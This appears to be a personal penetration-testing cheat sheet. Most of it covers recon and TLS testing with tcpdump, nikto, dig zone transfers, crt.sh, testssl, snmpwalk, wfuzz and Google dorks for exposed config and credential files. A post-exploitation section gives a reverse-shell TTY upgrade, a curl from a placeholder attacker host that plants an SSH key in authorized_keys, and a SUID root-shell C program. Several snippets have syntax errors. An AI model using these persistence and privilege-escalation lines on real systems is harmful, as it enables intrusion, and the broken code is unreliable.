Just some tips I found useful

Sec

Security tools

Tools

TCPDUMP

Only icmp traffic and no hostname:

tcpdump -nni <IF> icmp

Capture only packets from a specific IP host or destination

tcpdump -nni <IF> src host <IP>
tcpdump -nni <IF> dst host <IP>

Nikto tips

Header injection in the user-agent. From : https://www.sjoerdlangkemper.nl/2016/11/28/header-injection-in-nikto/

nl=$'\n'
cr=$'\r'
nikto -host http://example.com/ -useragent "nikto${cr}${nl}Some: header"

Or you can open “plugins/nikto_core.plugin” and search for “setup_hash”, then add a line like below:

$reqhash->{'Some-Key'} = "header value";

DNS

DNS zone transfer

$ dig axfr truc.org @IP
[...]

hr.truc.org...
uploads.truc.org...
admin.truc.org...

DNS research

Direct research in crt.sh database. Ticket from : https://groups.google.com/forum/#!topic/crtsh/oEDOzwr2Fuc:

#!/bin/sh
query="SELECT ci.NAME_VALUE NAME_VALUE FROM certificate_identity ci WHERE ci.NAME_TYPE = 'dNSName' AND reverse(lower(ci.NAME_VALUE)) LIKE reverse(lower('%.$1'));"
echo $query | \
psql -t -h crt.sh -p 5432 -U guest certwatch | \
sed -e 's:^ *::g' -e 's:^*\.::g' -e '/^$/d' | \
sort -u | sed -e 's:*.::g'

Another possibility is https://findsubdomains.com/subdomains-of/free.fr

Enumerate SSL ciphers using nmap:

nmap --script --ssl-enum-ciphers -p 443 HOST

Testing compression manually:

echo "" | openssl s_client -tls1 -connect host:443 | grep Compression
echo "" | openssl s_client -tls1_1 -connect host:443 | grep Compression
echo "" | openssl s_client -tls1_2 -connect host:443 | grep Compression

Testing BREACH manually:

openssl s_client -tls1 -connect host:443
GET / HTTP/1.0
Host: host
Accept-Encoding: compress, gzip
Referer: <DIFFERENT FROM THE HOST>

If returned data are compressed, server must be vulnerable

More info: https://en.wikipedia.org/wiki/BREACH.

New vulns : check https://github.com/Tripwire/padcheck

Testssl

testssl using proxy:

testssl --proxy http://127.0.0.1:8080 https://www.example.com

I personaly use the following commands to get all cipher suites:

testssl.sh -E -p -S -P --headers -U https://www.example.com

SSLScan

Scan target using client certificate

sslscan --show-ciphers --show-certificate --pk=client_cert.pfx --pkpass=password --xml=outputlog.xml https://target.fr

SSLYZE

Install using pip:

$pip install --user sslyze
$python -m sslyze --regular <TARGET>:443

More info:https://github.com/nabla-c0d3/sslyze

SSL configuration generator

Check:https://mozilla.github.io/server-side-tls/ssl-config-generator/

Certificat SSL

Take a look at http://crt.sh/ : https://crt.sh/?q=%25lexfo.fr%25

Tesseract

Limit the detection to 6 chars and uppercase letters and numbers:

tesseract image.png -c textord_width_limit=6 -c tessedit_char_whitelist=1234567890AZERTYUIOPMLKJHGFDSQWXCVBN -psm 7 -

TesserCap

See Tessercap to automatize some action before trying to “read” the picture: https://github.com/gursev/TesserCap. Tessercap doesn’t like IP address, add your host to C:/Windows/System32/driver/etc/hosts.

EXE only so be careful !!

Traceroute

Scapy (tcptraceroute.py) or MTR (http://linux-attitude.fr/post/traceroute-et-mtr).

Captcha

Nice Captcha attempt, but maybe to much complex for Mme Michu (standard user) https://github.com/gursev/pixel-captcha-project.

PHP WMI request

$wmi = new COM('winmgmts://');
$processes = $wmi->ExecQuery("SELECT * FROM Win32_Process");
foreach($processes as $process)
{  
    if strpos($process->CommandLine, "whoami") !== false)
    {
      echo $process->ProcessId . "<br />";
      echo  $process->CommandLine ."<br />";
      $process->Terminate();
    }
}

Postploitation

Get a TTY shell after reverse shell connection

python -c 'import tty;tty.spawn("/bin/bash")'
# check if it's /bin/bash or /bin/sh or whatever

Export PATH TERM and SHELL variale if missing

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin;/sbin:/bin
export TERM=xterm
export SHELL=bash

Export attacker’s key

echo $(curl http://X.X.X.X/id_rsa.pub) >> ~/.ssh/authorized_keys

Generate SUID C shell

int main(void){
  setresuid(0,0,0):
  system("/bin/bash");
}

Serialization / Deserialization

https://www.insomniasec.com/downloads/publications/Practical%20PHP%20Object%20Injection.pdf

Unserialize this, if error 500 -> unserialize server side:

O:12:"PDOStatement":0:{}

XXE

SSRF

https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/

Tomcat pentest

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/february/compromising-apache-tomcat-via-jmx-access/

Payloads

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection

Out of Band Exploitation (OOB) CheatSheet

Exfiltration, DNS, etc.

Credit card generator

Web crawler & analyzer

WFUZZ

https://github.com/xmendez/wfuzz written in python.

Match ‘Allow’ header in HTTP headers response:

wfuzz -X <GET/POST/OPTIONS> --filter "r.raw_content~'Allow'" -w <dict.txt> -H 'Access-Control-Request-Method: GET' -p localhost:8080 <TARGET>

Standalone client : postman

WebService

Standalone client : soapUI

Get internal name using dig

$ dig +nsid CH TXT hostname.bind @<IP>
# example
$ dig +nsid CH TXT hostname.bind @67.205.168.227
[..]
;; ANSWER SECTION:
hostname.bind.      0   CH  TXT "mail.nasershipping.com-1563290346967-s-2vcpu-2gb-nyc1-01"
[...]

Extension to use for fuzzing

  • .swp, .bak, .inc, .php, .txt, .xml, .config

SNMP

  • SNMP v2c request
snmpwalk -v2c -c public <IP> .1
  • SNMP v3 request
snmpwalk -v3 -l authPriv -u snmp-poller -a SHA -A "PASSWORD1" -x AES -X "PASSWORD1" 10.10.60.50

Google dork list

site:"target[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess

Last updated on Wednesday, May 6, 2020
Published on Wednesday, May 6, 2020